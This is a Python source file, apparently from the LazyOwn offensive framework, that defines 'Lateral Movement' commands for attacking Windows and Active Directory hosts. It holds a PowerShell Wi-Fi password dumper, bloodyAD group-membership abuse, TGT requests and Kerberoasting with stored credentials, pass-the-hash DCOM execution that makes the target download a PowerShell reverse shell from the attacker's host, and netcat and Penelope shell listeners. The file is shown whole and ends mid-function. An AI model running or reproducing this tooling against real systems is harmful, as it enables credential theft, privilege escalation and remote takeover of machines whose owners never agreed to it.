"""lateral commands migrated from lazyown.py.

Auto-generated by scripts/migrate_lazyown.py.
"""
from __future__ import annotations

import cmd2

import os

from cli.commands._base import LazyOwnCommandSet
from utils import (
    GREEN,
    RED,
    RESET,
    YELLOW,
    check_rhost,
    print_error,
    print_msg,
    print_warn,
)


class LateralMigratedCommandSet(LazyOwnCommandSet):
    phase = "lateral"
    category = "08. Lateral Movement"

    @cmd2.with_category("08. Lateral Movement")
    def do_vpn(self, line):
        """
        Connect to a VPN by selecting from available .ovpn files.

        This function performs the following actions:
        1. Lists all `.ovpn` files in the current directory, sorted alphabetically.
        2. Handles cases with and without arguments:
        - Without arguments: Lists available `.ovpn` files and prompts the user to select one by number.
        - With a single argument: Treats the argument as a number and attempts to connect to the corresponding `.ovpn` file.
        3. Connects to the selected `.ovpn` file using `openvpn` and displays appropriate messages.
        4. Handles invalid input with error messages.

        Usage:
            vpn           # List available .ovpn files and select one to connect to
            vpn <number>  # Connect directly to the .ovpn file corresponding to the number

        :param line: The number of the .ovpn file to connect to, or an empty string to list available files.
        :type line: str
        :returns: None

        Manual execution:
        To manually use this function:
        1. Run the function with no arguments to list available `.ovpn` files.
        2. Choose a file by entering the corresponding number.
        3. Alternatively, run the function with a number argument to connect directly to the specified `.ovpn` file.

        Note: Ensure you have the necessary permissions and the `openvpn` command is available on your system.
        """

        ovpn_files = sorted([f for f in os.listdir("vpn") if f.endswith(".ovpn")])
        if not line.strip():
            if not ovpn_files:
                print_msg("No .ovpn files found.")
                return

            print_msg("Available .ovpn files:")
            for idx, file in enumerate(ovpn_files, start=1):
                print_msg(f"{idx}: {file}")

            choice = input("Select the number of the .ovpn file to connect to: ")
            try:
                choice = int(choice)
                if 1 <= choice <= len(ovpn_files):
                    file_to_connect = ovpn_files[choice - 1]
                else:
                    print_error("Invalid choice. Please select a number from the list.")
                    return
            except ValueError:
                print_error("Invalid input. Please enter a number.")
                return

        else:
            args = line.split()
            if len(args) == 1:
                try:
                    choice = int(args[0])
                    if 1 <= choice <= len(ovpn_files):
                        file_to_connect = ovpn_files[choice - 1]
                    else:
                        print_error("Invalid number. Please select a number from the list.")
                        return
                except ValueError:
                    print_error("Invalid input. Please enter a number.")
                    return
            else:
                print_error("Invalid command format. Use 'vpn' to list and select, or 'vpn <number>' to connect directly.")
                return

        print_msg(f"Connecting to vpn/{file_to_connect}")
        self.cmd(f"openvpn vpn/{file_to_connect}")

    @cmd2.with_category("08. Lateral Movement")
    def do_id_rsa(self, line):
        """
        Create an SSH private key file and connect to a remote host using SSH.

        This function performs the following actions:
        1. Checks if the provided remote host (`self.params['rhost']`) is valid.
        2. Verifies that a username is provided as an argument.
        3. Creates an SSH private key file in the `sessions` directory with a name based on the provided username.
        4. Opens the created file in the `nano` text editor for the user to paste the private key.
        5. Sets the file permissions to read-only for the owner (600).
        6. Optionally formats the key if the user chooses to.
        7. Connects to the remote host via SSH using the created private key.
        8. Displays a warning message when the SSH connection is closed.

        Usage:
            id_rsa <username>

        :param line: The username for SSH connection and private key file naming.
        :type line: str
        :returns: None

        Manual execution:
        To manually use this function:
        1. Run the function with the username argument, e.g., `id_rsa myuser`.
        2. Paste the private key into the `nano` editor when prompted.
        3. Save and exit the editor.
        4. The SSH connection will be established using the private key.

        Note: Ensure you have the necessary permissions to create files and connect via SSH.
        """

        rhost = self.params['rhost']
        if not check_rhost(self.params['rhost']):
            return
        if not line:
            print_error(f"must pass the user by argument like:{GREEN} id_rsa username")
            return
        file = f"sessions/id_rsa_{line}"
        print_msg(f"Try... nano {file}")
        self.cmd(f"nano {file} && chmod 600 {file}")
        format_key = input("Do you want to format the OpenSSH key? (y/n): ").lower()
        if format_key == 'y':
            with open(file) as key_file:
                raw_key = key_file.read()

            choice = input("    [?] do you wat format your rsa key ? 1) for openssh format or 2) for rsa_key format [1/2] (default: 1): ") or '1'
            if choice == '1':
                formatted_key = format_openssh_key(raw_key)

                with open(file, 'w') as key_file:
                    key_file.write(formatted_key)

                print_msg("Key formatted and saved.")
            elif choice == '2':
                formatted_key = format_rsa_key(raw_key)

                with open(file, 'w') as key_file:
                    key_file.write(formatted_key)

                print_msg("Key formatted and saved.")
            else:
                print_warn("Wrong choice!")
        print_msg(
            f"{YELLOW} Connecting to ssh {line}@{self.params['rhost']} -i {file} {RED}[;,;] {RESET}"
        )
        self.onecmd("create_session_json")
        self.cmd(f"ssh {line}@{self.params['rhost']} -i {file}")
        print_warn("ssh connection closed")
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_sshd(self, line):
        """
        Starts the SSH service and displays its status.

        1. Executes the command to start the SSH service:
        - Runs `sudo systemctl start ssh` to initiate the SSH service.

        2. Displays the status of the SSH service:
        - Runs `sudo systemctl status ssh` to show the current status of the SSH service.

        :param line: Not used in this function.
        :type line: str
        :returns: None

        Manual execution:
        To manually run these tasks, you would need to:
        - Execute `sudo systemctl start ssh` to start the SSH service.
        - Run `sudo systemctl status ssh` to check the status of the SSH service.

        Note: Ensure that you have the necessary permissions to start services using `sudo` and that the SSH service is installed on your system.
        """
        print_msg("Try... sudo systemctl start ssh")
        self.cmd("sudo systemctl start ssh")
        self.cmd("sudo systemctl status ssh")
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_wifipass(self, line):
        """
        This function generates a PowerShell script that retrieves saved Wi-Fi passwords on a Windows system.
        The script gathers the Wi-Fi profiles, extracts their passwords, and saves the information in a text file
        named 'wifi_passwords.txt' in the directory where the script is executed. The generated PowerShell command
        is copied to the clipboard for easy execution.

        Parameters:
        line (str): This parameter is not used within the function but is required for the command interface.

        The function does not return any value.
        """
        command = '''
        $currentDir = Get-Location
        $networks = netsh wlan show profiles
        $networkNames = $networks | Select-String -Pattern '(?:Perfil\\s*:\\s)(.*)' | ForEach-Object { $_.Matches[0].Groups[1].Value }
        $results = @()
        foreach ($networkName in $networkNames) {
            $command = 'netsh wlan show profile "' + $networkName + '" key=clear'
            $currentResult = Invoke-Expression $command
            $results += $currentResult
        }
        $result = $results -join "`n"
        $outputFile = Join-Path $currentDir "wifi_passwords.txt"
        $result | Out-File -FilePath $outputFile -Encoding utf8
        Write-Host "Wi-Fi passwords saved to $outputFile"'''.replace("        ",'')
        copy2clip(command)
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_bloodyAD(self, line):
        """
        Execute the bloodyAD.py command for a specific user or all users listed in the users.txt file.

        This function interacts with BloodyAD to add users to a group in an Active Directory environment.
        It allows the user to select a specific user from the list or execute the command for all users.
        (use download_external option 48 to clone the repo)
        Args:
            line (str): The organizational unit (OU) in the format 'CN=EXAMPLE,DC=DOMAIN,DC=EXT'.
                        If not provided, the user is prompted to enter it.

        Returns:
            None

        Workflow:
            1. Extract parameters and set up paths.
            2. Check the reachability of the remote host.
            3. Prompt the user for a CN if not provided.
            4. Check if the users.txt file exists and read the list of users.
            5. Display the list of users and prompt the user to select a specific user.
            6. Execute the bloodyAD.py command for the selected user or all users.

        Raises:
            FileNotFoundError: If the users.txt file does not exist.

        Example:
            To execute the command for a specific user:
            >>> do_bloodyAD("")

            To execute the command for all users:
            >>> do_bloodyAD("")
        """
        path = os.getcwd()
        bloodyad_git = "https://github.com/CravateRouge/bloodyAD.git"
        bloodyad_path = os.path.join("external", ".exploit", "bloodyad")
        bloodyad_path = f"{path}/{bloodyad_path}"

        if not os.path.exists(bloodyad_path):
            self.cmd(f"git clone {bloodyad_git} {bloodyad_path}")
            self.cmd(f"cd {bloodyad_path} && pip3 install -r requirements.txt")

        url = self.params['url']
        rhost = self.params['rhost']
        subdomain = self.params['subdomain']
        domain = self.params['domain']
        path = os.getcwd()
        if line.startswith("pass"):
            credentials = get_credentials()
            if not credentials:
                return
            for user, passwd in credentials:
                cn = input("    [!] Enter CN= example SERVICE ACCOUNTS: ") or 'SERVICE ACCOUNTS'
                cmd = f"bloodyAD --host '{self.params['rhost']}' -d '{subdomain}.{self.params['domain']}' -u '{user}' -p '{passwd}'  add groupMember '{cn}' {user}"
                self.cmd(cmd)
                return
        elif line.startswith("cache"):
            users_txt = get_users_dic()
            domain = get_domain(url)
            ca = self.params['domain'].split(".") if self.params['domain'] else []
            base_domain = ca[0].upper() if len(ca) > 0 else ""
            ext = ca[1].upper() if len(ca) > 1 else ""
            if not check_rhost(self.params['rhost']):
                return

            cn = input("    [!] Enter CN= example CHIEFS MARKETING: ")

            if not os.path.exists(users_txt):
                print_error(f"you need {users_txt} exec: sh nano sessions/users.txt, to create first attemp use cewl")
                return

            with open(users_txt) as file:
                users = [user.strip() for user in file]

            print_msg("Select a user by number to execute the command for a specific user, or press Enter to execute for all users:")
            for idx, user in enumerate(users, start=1):
                print_warn(f"{idx}. {user}")

            selection = input("Enter the number of the user you want to select: ").strip()
            sub = input("enter the subdomain example dc01: ")
            if selection.isdigit():
                selected_user = users[int(selection) - 1]
                command = f"export KRB5CCNAME=/tmp/{selected_user}.ccache ; {bloodyad_path}/bloodyAD.py --host {sub}.{self.params['domain']} -d {self.params['domain']} --dc-ip {self.params['rhost']} -u {selected_user} -k  add groupMember \"CN={cn},CN=USERS,DC={base_domain},DC={ext}\" {selected_user}"
                print_msg(command)
                self.cmd(command)
            else:
                for user in users:
                    command = f"export KRB5CCNAME=/tmp/{user}.ccache ; {bloodyad_path}/bloodyAD.py --host {sub}.{self.params['domain']} -d {self.params['domain']} --dc-ip {self.params['rhost']} -u {user} -k add groupMember \"CN={cn},CN=USERS,DC={base_domain},DC={ext}\" {user}"
                    print_msg(command)
                    self.cmd(command)
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_getTGT(self, line):
        """
        Requests a Ticket Granting Ticket (TGT) using the Impacket tool with provided credentials.

        This function performs the following actions:
        1. Checks if the provided target host (`self.params['rhost']`) is valid.
        2. Reads credentials from the `credentials.txt` file.
        3. Uses each credential (username and password) to request a TGT with the Impacket tool.
        4. Constructs and executes the Impacket command to obtain a TGT for each set of credentials.

        Parameters:
        line (str): A command line argument, not used in this implementation.

        Returns:
        None
        """
        url = self.params['url']
        domain = get_domain(url)
        rhost = self.params['rhost']
        os.getcwd()

        if not check_rhost(self.params['rhost']):
            return

        path_cred = "sessions/credentials.txt"

        if not os.path.exists(path_cred):
            print_error("you need credentials.txt exec: createcredentials admin:admin")
            return
        with open(path_cred) as file:
            for file_line in file:
                params = file_line.split(":")
                if not line:
                    user = params[0]
                else:
                    user = line
                passwd = params[1].replace("\n", "")
                tmp = f"/tmp/{user}.ccache"
                command = f"sudo impacket-getTGT -dc-ip {self.params['rhost']} '{self.params['domain']}/{user}:{passwd}' ; export KRB5CCNAME={tmp} "
                print_msg(command)
                self.cmd(command)
                cmd = f"mv {user}.ccache {tmp}"
                print_msg(cmd)
                self.cmd(cmd)

        return

    @cmd2.with_category("08. Lateral Movement")
    def do_tord(self, line):
        """
        Execute the tor.sh script with the specified port or default to port 80 if no port is provided.

        This function constructs a command to run the `tor.sh` script with superuser privileges,
        it defaults to port 80.
        The command is then printed and executed.

        Parameters:
        line (str): Defaults to "80"

        Returns:
        None

        Example:
        >>> do_tord(self, "")
        sudo bash sessions/tor.sh

        >>> do_tord(self, "")
        sudo bash sessions/tor.sh

        Note:
        Ensure that the `tor.sh` script exists in the `sessions` directory and that you have the
        necessary permissions to execute scripts with `sudo`.
        """
        if not line:
            line = "80"

        command = f"sudo bash sessions/tor.sh {line}"
        print_msg(command)
        self.cmd(command)

        return

    @cmd2.with_category("08. Lateral Movement")
    def do_shadowsocks(self, line):
        """
        Execute the Shadowsocks tool to create a secure tunnel for network traffic.

        This function allows the user to specify various parameters for configuring and running the Shadowsocks client
        or server. It handles user input for server address, port, password, encryption method, and other options,
        constructs the command, and executes it.

        :param line: Not used in this implementation.
        :returns: None
        """
        if not is_binary_present("sslocal") and not is_binary_present("ssserver"):
            print_warn("Shadowsocks binary not found. Installing...")
            print_msg("Choose installation method for Shadowsocks:")
            print_msg("1. Install using Apt")
            print_msg("2. Install using Cargo")

            choice = input("Enter choice (1 or 2): ").strip()

            if choice == '1':
                self.cmd("sudo apt-get install shadowsocks-libev -y")
                print_msg("Shadowsocks installed using package manager.")

            elif choice == '2':
                self.cmd("cargo install shadowsocks-rust")

            else:
                print_error("Invalid choice. Please enter 1 or 2.")
                return
        if not line:
            mode = input("    [!] Choose mode (server 1 or client 2): ").strip().lower()
        else:
            mode = line

        if mode == '1':
            lport = self.params['lport']
            password = input("    [!] Enter the Shadowsocks password: ").strip()
            method = input("    [!] Enter the encryption method (e.g., 'aes-256-gcm', 'aes-256-cfb', 'chacha20', etc.): ").strip() or 'aes-256-gcm'

            command = (
                f"ssserver -s '[::]:{lport}' -m '{method}' -k '{password}' -u"
            ).strip()

            print_msg(f"Generated server command: {command}")

            lhost = self.params['lhost']
            client_command = f"sslocal -b '127.0.0.1:1080' -s '{self.params['lhost']}:{lport}' -m '{method}' -k '{password}' -u --outbound-bind-interface lo0"
            copy2clip(client_command)
            print_msg(f"Client command copied to clipboard: {client_command}")

            self.cmd(command)

        elif mode == '2':
            rhost = self.params['rhost']
            rport = self.params['rport']
            server_address = input("    [!] Enter the Shadowsocks server address: ").strip() or self.params['rhost']
            server_port = input("    [!] Enter the Shadowsocks server port: ").strip() or rport
            password = input("    [!] Enter the Shadowsocks password: ").strip()
            method = input("    [!] Enter the encryption method (e.g., 'aes-256-gcm', 'aes-256-cfb', 'chacha20', etc.): ").strip() or 'aes-256-gcm'

            command = (
                f"sslocal -b '127.0.0.1:1080' -s '{server_address}:{server_port}' -m '{method}' -k '{password}' -u --outbound-bind-interface lo0"
            ).strip()

            print_msg(f"Generated client command: {command}")
            self.cmd(command)

        else:
            print_error("Invalid mode. Please enter '1' or '2'.")

        return

    @cmd2.with_category("08. Lateral Movement")
    def do_rnc(self, line):
        """
        Runs `nc` with rlwrap  the specified port for listening.

        This function starts a `nc` listener with rlwrap  on the specified local port. It can use a port defined in the `lport` parameter or a port provided as an argument.

        Usage:
            rnc <port>

        :param line: The port number to use for the `nc` listener. If not provided, it defaults to the `lport` parameter.
        :type line: str
        :returns: None

        Manual execution:
        1. Ensure that `nc` is installed and accessible from your command line.
        2. The port number can either be provided as an argument or be set in the `lport` parameter of the function.
        3. Run the function to start `nc` on the specified port.

        If no port is provided as an argument, the function will use the port specified in the `lport` parameter. If a port is provided, it overrides the `lport` value.

        After starting the listener, the function prints a message indicating that `nc` is running on the specified port and another message when the session is closed.

        Dependencies:
        - `nc`: A tool used for creating reverse shells or bind shells.
        """

        lport = self.params['lport']
        if not lport and not line:
            print_error(
                f"lport must be assign or pass the port by parameter like: nc 6666.{RESET}"
            )
            return
        if not line:
                if int(lport) < 1024:
                    print_msg(f"Try.. sudo rlwrap  --always-readline nc -lvnp {lport}{RESET}")
                    self.cmd(f"sudo rlwrap  --always-readline nc -lvnp {lport}")
                else:
                    print_msg(f"Try.. rlwrap  --always-readline nc -lvnp {lport}{RESET}")
                    self.cmd(f"rlwrap  --always-readline nc -lvnp {lport}")
        else:
            if line.startswith("file"):
                args = line.split(" ")
                if len(args) == 2:
                    filename = args[1]
                    command = f"rlwrap  --always-readline nc -lp {lport} > sessions/{filename}"
                    print_msg(command)
                    self.cmd(command)

                else:
                    command = f"rlwrap  --always-readline nc -lp {lport} > sessions/secret.zip"
                    print_msg(command)
                    self.cmd(command)

            else:
                if int(line) < 1024:
                    print_msg(f"Try.. sudo rlwrap  --always-readline nc -lvnp {line}{RESET}")
                    self.cmd(f"sudo rlwrap  --always-readline nc -lvnp {line}")
                else:
                    print_msg(f"Try.. rlwrap  --always-readline nc -lvnp {line}{RESET}")
                    self.cmd(f"rlwrap  --always-readline nc -lvnp {line}")
        print_msg(
            f"{RED}[*] {YELLOW} Shutdown rlwrap nc sessions in port {RED} [{lport}|{line}] {RESET}"
        )
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_gospherus(self, line):
        """
        Command gospherus: Clones and uses the Gopherus tool to generate gopher payloads for various services.
        Use the command template_helper_serializer to generate the serialization payload. more info help template_helper_serializer

        This function performs the following tasks:
        0. Install Python2 (Old protocol, old t00l, old python)
        1. Checks if Gopherus is already cloned in the external/.exploit directory.
        2. Clones the Gopherus repository if not already present.
        3. Enumerates the possible exploits and prompts the user to choose one.
        4. Runs the selected exploit using Gopherus.

        Args:
            line (str): Optional argument for specifying the chosen exploit.

        Returns:
            None

        Example:
            gospherus 2
        """
        path = os.getcwd()
        exploit_dir = os.path.join(path, "external/.exploit")
        gopherus_url = "https://github.com/tarunkant/Gopherus.git"
        gopherus_dir = os.path.join(exploit_dir, "Gopherus")

        os.makedirs(exploit_dir, exist_ok=True)

        if not os.path.exists(gopherus_dir):
            print_msg("Cloning Gopherus repository...")
            self.cmd(f"git clone {gopherus_url} {gopherus_dir}")
        else:
            print_msg("Gopherus already cloned, skipping cloning.")

        exploits = [
            "MySQL",
            "PostgreSQL",
            "FastCGI",
            "Redis",
            "Zabbix",
            "PyMemcache",
            "RbMemcache",
            "PhpMemcache",
            "DmpMemcache",
            "SMTP"
        ]

        for i, exploit in enumerate(exploits, 1):
            print_msg(f"{i}. {exploit}")

        if not line:
            choice = input("Select the exploit number: ") or '8'
        else:
            choice = line.strip()

        try:
            choice = int(choice)
            if 1 <= choice <= len(exploits):
                selected_exploit = exploits[choice - 1].lower()
                print_msg(f"Running Gopherus exploit: {selected_exploit}")
                print_msg(f"Try... cd {gopherus_dir} && python2 gopherus.py --exploit {selected_exploit}")
                self.cmd(f"cd {gopherus_dir} && python2 gopherus.py --exploit {selected_exploit}")
            else:
                print_warn("Invalid choice.")
        except ValueError:
            print_warn("Invalid input, expected a number.")

        return

    @cmd2.with_category("08. Lateral Movement")
    def do_mssqlcli(self, line):
        """
        Attempts to connect to an MSSQL server using the mssqlclient.py tool with Windows authentication.

        The function retrieves the necessary parameters (remote host and self.params['domain']) from the
        instance's parameter dictionary. If a credentials file exists in the 'sessions_dir',
        it reads the file and uses the username/password combinations found there. If the file
        does not exist, it prompts the user for a username and password.

        The password is copied to the clipboard for convenience. A command is constructed using
        the mssqlclient.py tool, and it is then executed to initiate the connection to the MSSQL
        server.

        Args:
            line (str): The password input from the command line or an empty string if not provided.

        Returns:
            None
        """
        sessions_dir = "sessions"
        rhost = self.params['rhost']
        domain = self.params['domain']
        subdomain = self.params['subdomain']
        fulldomain = f"{subdomain}.{self.params['domain']}"
        if os.path.exists(os.path.join(sessions_dir, 'credentials.txt')):
            if line:
                credentials = get_credentials(ncred=int(line))
            else:
                credentials = get_credentials()
            if not credentials:
                return

            for user, passwd in credentials:
                password = passwd
                username = user
        else:
            command = f"impacket-mssqlclient -k {fulldomain}"
            print_msg(command)
            self.cmd(command)
            return
        try:
            copy2clip(password)
            command = f"mssqlclient.py {self.params['domain']}/{username}@{self.params['rhost']}"
            print_msg(command)
            self.cmd(command)
            return

        except Exception as e:
            print_error(f"Failed to Connect with the mssql: {str(e)}")

        return

    @cmd2.with_category("08. Lateral Movement")
    def do_penelope(self, line):
        """
        Command penelope: Installs and runs Penelope for handling reverse and bind shells.

        This function performs the following tasks:
        1. Checks if Penelope is already cloned in the external/.exploit directory.
        2. Clones the Penelope repository if not present.
        3. Prompts the user for various options to configure and run Penelope.
        4. Executes Penelope with the specified options, supporting multiple features like reverse shell, bind shell, file server, etc.

        Args:
            line (str): Optional argument for specifying the port and other Penelope options.

        Returns:
            None

        Example:
            penelope 5555 -i eth0
        """

        path = os.getcwd()
        exploit_dir = os.path.join(path, "external/.exploit")
        penelope_url = "https://github.com/brightio/penelope.git"
        penelope_dir = os.path.join(exploit_dir, "penelope")
        default_port = self.params['lport']
        os.makedirs(exploit_dir, exist_ok=True)

        if not os.path.exists(penelope_dir):
            print_msg("Cloning Penelope repository...")
            self.cmd(f"git clone {penelope_url} {penelope_dir}")
        else:
            print_msg("Penelope already cloned, skipping cloning.")

        if not line:
            port = input(f"    {GREEN}[!] Enter the port to listen/connect to (default {default_port}): ").strip() or default_port
            interface = input("    [?] Enter the interface or IP address to listen on (optional, default is 0.0.0.0): ").strip() or "0.0.0.0"
            connect = input("    [?] Enter the bind shell host (optional): ").strip()
            show_payloads = input("    [?] Show sample payloads for reverse shell? (y/n): ").strip().lower() == 'y'
            list_interfaces = input("    [?] Show the available network interfaces? (y/n): ").strip().lower() == 'y'
            maintain_shells = input("    [?] Maintain total shells per target? Enter number (optional): ").strip()
            serve_files = input("    [?] Serve files via HTTP? (y/n): ").strip().lower() == 'y'
            file_server_port = input("    [?] Enter file server port (default 8000): ").strip() or "8000"
            file_server_password = input("    [?] Enter URL prefix password (optional): ").strip()
        else:
            args = line.split()
            port = args[0] if len(args) > 0 else default_port
            interface = ""
            connect = ""
            show_payloads = False
            list_interfaces = False
            maintain_shells = ""
            serve_files = False
            file_server_port = "8000"
            file_server_password = ""

            i_flag = False
            c_flag = False
            s_flag = False

            for i in range(1, len(args)):
                if args[i] == '-i':
                    i_flag = True
                    continue
                if args[i] == '-c':
                    c_flag = True
                    continue
                if args[i] == '-s':
                    s_flag = True
                    continue

                if i_flag:
                    interface = args[i]
                    i_flag = False
                elif c_flag:
                    connect = args[i]
                    c_flag = False
                elif s_flag:
                    file_server_port = args[i]
                    s_flag = False
                elif args[i] == '-a':
                    show_payloads = True
                elif args[i] == '-l':
                    list_interfaces = True
                elif args[i].startswith('-m'):
                    maintain_shells = args[i+1]
                elif args[i] == '-pass':
                    file_server_password = args[i+1]

        command = f"python3 {penelope_dir}/penelope.py {port}"
        if interface:
            command += f" -i {interface}"
        if connect:
            command += f" -c {connect}"
        if show_payloads:
            command += " -a"
        if list_interfaces:
            command += " -l"
        if maintain_shells:
            command += f" -m {maintain_shells}"
        if serve_files:
            command += " -s"
            if file_server_port:
                command += f" -p {file_server_port}"
            if file_server_password:
                command += f" -pass {file_server_password}"

        print_msg(f"Running Penelope with command: {command}")
        self.cmd(command)
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_stormbreaker(self, line):
        """
        Command stormbreaker: Automates the installation and usage of Storm-Breaker for performing various network attacks.

        This function performs the following tasks:
        1. Clones and installs Storm-Breaker if not already installed.
        2. Prompts the user for optional parameters and target configuration.
        3. Executes Storm-Breaker to perform various attacks using the target configuration.

        Args:
            line (str): Optional argument for specifying additional Storm-Breaker options.

        Returns:
            None

        Example:
            stormbreaker --verbose
        """

        stormbreaker_repo = "https://github.com/ultrasecurity/Storm-Breaker"
        stormbreaker_dir = os.path.join(os.getcwd(), "external/.exploit/Storm-Breaker")

        if not os.path.exists(stormbreaker_dir):
            print_msg("Cloning Storm-Breaker repository...")
            self.cmd(f"git clone {stormbreaker_repo} {stormbreaker_dir}")
            print_msg("Running installation script...")
            self.cmd(f"cd {stormbreaker_dir} && sudo bash install.sh")
            print_msg("Installing required Python dependencies...")
            self.cmd(f"sudo python3 -m pip3 install -r {stormbreaker_dir}/requirements.txt")
        else:
            print_msg("Storm-Breaker is already installed, skipping setup.")

        if not line:
            verbose = input("    [?] Enable verbose mode? (yes/no, default 'no'): ").strip().lower() or "no"
        else:
            args = line.split()
            verbose = "yes" if "--verbose" in args else "no"

        verbose_option = "--verbose" if verbose == "yes" else ""
        command = f"cd {stormbreaker_dir} && sudo python3 st.py {verbose_option}"

        print_msg(f"Running Storm-Breaker: {command} you can run:{GREEN} ngrok 2525{RESET}")
        self.cmd(command)
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_regeorg(self, line):
        """
        Executes the reGeorg tool for HTTP(s) tunneling through a SOCKS proxy.

        This function performs the following actions:
        1. Checks if the reGeorg tool is installed; if not, it clones the repository and sets up the environment.
        2. Validates the command line arguments, specifically the port and URL required for the SOCKS proxy.
        3. Constructs the command to run the reGeorg SOCKS proxy with the specified options and executes it.
        4. Provides usage instructions in case of incorrect command line argument formats.

        Parameters:
        line (str): Command argument specifying the parameters for the reGeorg execution.
                    - The expected format is: "<port> <url>", where <port> is the listening port and <url> is the URL
                    containing the tunnel script.

        Returns:
        None
        """
        lport = self.params['lport']
        url = self.params['url']
        path = os.getcwd()
        reGeorg_git = "https://github.com/sensepost/reGeorg.git"
        reGeorg_dir = os.path.join(path, "external/.exploit/reGeorg")

        if not os.path.exists(reGeorg_dir):
            print_msg("Cloning reGeorg repository...")
            self.cmd(f"git clone {reGeorg_git} {reGeorg_dir}")
        else:
            print_msg("reGeorg already installed, skipping setup.")

        if line:
            args = line.split()
            if len(args) != 2:
                print_error("Incorrect usage. Use: <port> <url> to start the reGeorg SOCKS proxy.")
                return

            listen_port = args[0]
            url = args[1]
        else:
            listen_port = input(f"    [!] Enter the port (default {lport}): ") or lport
            url = input(f"    [!] Enter the url (default {url}): ") or url

        command = f"python2 {reGeorg_dir}/reGeorgSocksProxy.py -p {listen_port} -u {url}"
        print_msg(f"Executing command: {command}")
        self.cmd(command)
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_targetedKerberoas(self, line):
        """
        Executes the targetedKerberoast tool for extracting Kerberos service tickets.

        This function performs the following actions:
        1. Verifies the presence of the targetedKerberoast tool; if not installed, it clones the repository and installs dependencies.
        2. Prompts for parameters such as the self.params['domain'], username, and other configurations required by targetedKerberoast.
        3. Executes the targetedKerberoast tool with specified options for obtaining "kerberoastable" hashes.

        Parameters:
        line (str): Command arguments specifying the user, self.params['domain'], and options.
                    Expected format:
                        - self.params['domain'] user hash or password [optional parameters]

        Returns:
        None
        """
        path = os.getcwd()
        targetedKerberoast_git = "https://github.com/ShutdownRepo/targetedKerberoast.git"
        targetedKerberoast_path = os.path.join("external", ".exploit", "targetedKerberoast")
        targetedKerberoast_path = f"{path}/{targetedKerberoast_path}"

        if not os.path.exists(targetedKerberoast_path):
            print_warn("targetedKerberoast is not installed. Cloning and installing dependencies.")
            self.cmd(f"git clone {targetedKerberoast_git} {targetedKerberoast_path}")
            self.cmd(f"pip3 install -r {targetedKerberoast_path}/requirements.txt")
            print_msg("Installation completed.")

        rhost = self.params['rhost']
        domain = self.params['domain']
        username = input("    [!] Enter the target username (default: administrator): ").strip() or "administrator"
        dc_ip = input(f"    [!] Enter the Domain Controller IP for {self.params['domain']} (e.g., {self.params['rhost']}): ").strip() or self.params['rhost']
        output_file = input(f"    [!] Enter the output filename for hashes (default: sessions/{self.params['rhost']}_kerberoast_hashes.txt): ").strip() or f"sessions/{self.params['rhost']}_kerberoast_hashes.txt"
        auth_choice = input("    [!] Authenticate using password or hash (default: password): ").strip().lower() or "password"
        if auth_choice == "password":

            credentials = get_credentials()

            if not credentials:
                password = input(f"    [!] Enter password for {username}@{self.params['domain']}: ").strip()
                auth_param = f"-p '{password}'"
            else:
                for user, password in credentials:
                    auth_param = f"-p '{password}'"
        else:
            hashis = get_hash()
            auth_param = f"-H '{hashis}'"

        verbosity = input("    [!] Set verbosity level (1 for verbose, 2 for debug, default: quiet): ").strip() or "quiet"
        verbosity_param = "-q" if verbosity == "quiet" else "-v" * int(verbosity)
        targetedKerberoast_command = (
            f"python3 {targetedKerberoast_path}/targetedKerberoast.py -v - -d {self.params['domain']} -u {username} "
            f"{auth_param} --dc-ip {dc_ip} -o {output_file} {verbosity_param}"
        )
        print_msg(f"Running targetedKerberoast with command: {targetedKerberoast_command}")
        self.cmd(targetedKerberoast_command)
        self.logcsv(f"targetedKerberoast {targetedKerberoast_command}")
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_dcomexec(self, line):
        """
        Executes the Impacket dcomexec tool to run commands on a remote system using DCOM.

        This function performs the following actions:
        1. Validates the target host (self.params['rhost']) and self.params['domain'] parameters.
        2. If the line argument is "pass", it searches for credential files with the pattern `credentials*.txt`,
        allows the user to select credentials, and constructs the dcomexec command using them.
        3. If the line argument is "hash", it searches for a hash file, prompts the user for a username, and
        constructs the dcomexec command using the hash.
        4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

        Parameters:
        line (str): A command argument to determine the authentication mode.
                    If "pass", the function searches for credential files and authenticates using the selected file.
                    If "hash", it uses a hash file for authentication.
                    If neither, it prints an error message with usage instructions.

        Returns:
        None
        """

        rhost = self.params['rhost']
        lhost = self.params['lhost']
        domain = self.params['domain']
        os.getcwd()
        if not is_binary_present("impacket-dcomexec"):
            print_warn("impacket-dcomexec is not installed. Installing.")
            self.cmd("sudo apt install impacket -y")
            return
        if not check_rhost(self.params['rhost']):
            return
        self.onecmd('createrevshell')
        if line == "pass":
            credentials = get_credentials()
            if not credentials:
                return
            for user, passwd in credentials:
                command = (
                    f"impacket-dcomexec -object MMC20 -silentcommand -debug "
                    f"{self.params['domain']}/{user}:{passwd}@{self.params['rhost']} 'powershell.exe Invoke-WebRequest "
                    f"-Uri http://{self.params['lhost']}/Invoke-PowerShellTcp.ps1 -OutFile C:\\Windows\\TEMP\\Invoke-PowerShellTcp.ps1'"
                )
                print_msg(command)
                self.cmd(command)
            return

        elif line == "hash":
            hash_value = get_hash()
            if not hash_value:
                return
            if ":" in hash_value:
                hashis = f"-hashes {hash_value}"
            else:
                hashis = f"-hashes :{hash_value}"
            user = input("    [!] Enter Username (default: Administrator): ") or 'Administrator'
            command = (
                f"impacket-dcomexec -object MMC20 -silentcommand -debug "
                f"{hashis} {self.params['domain']}/{user}@{self.params['rhost']} 'powershell.exe Invoke-WebRequest "
                f"-Uri http://{self.params['lhost']}/Invoke-PowerShellTcp.ps1 -OutFile C:\\Windows\\TEMP\\Invoke-PowerShellTcp.ps1'"
            )
            print_msg(command)
            self.cmd(command)
            self.logcsv(f"dcomexec {command}")
            return

        else:
            print_error("Incorrect usage. Use 'pass' to authenticate with credentials or 'hash' to use a hash.")
            return

    @cmd2.with_category("08. Lateral Movement")
    def do_upload_c2(self, line):
        """
        upload command in the client using the C2 to upload a file

        Parameters:
        command (str): client_id [optional], Command to exec.

        Returns:
        None
        """
        if line:
            parts = line.split(maxsplit=1)
            nparts = len(parts)
            if nparts == 1:
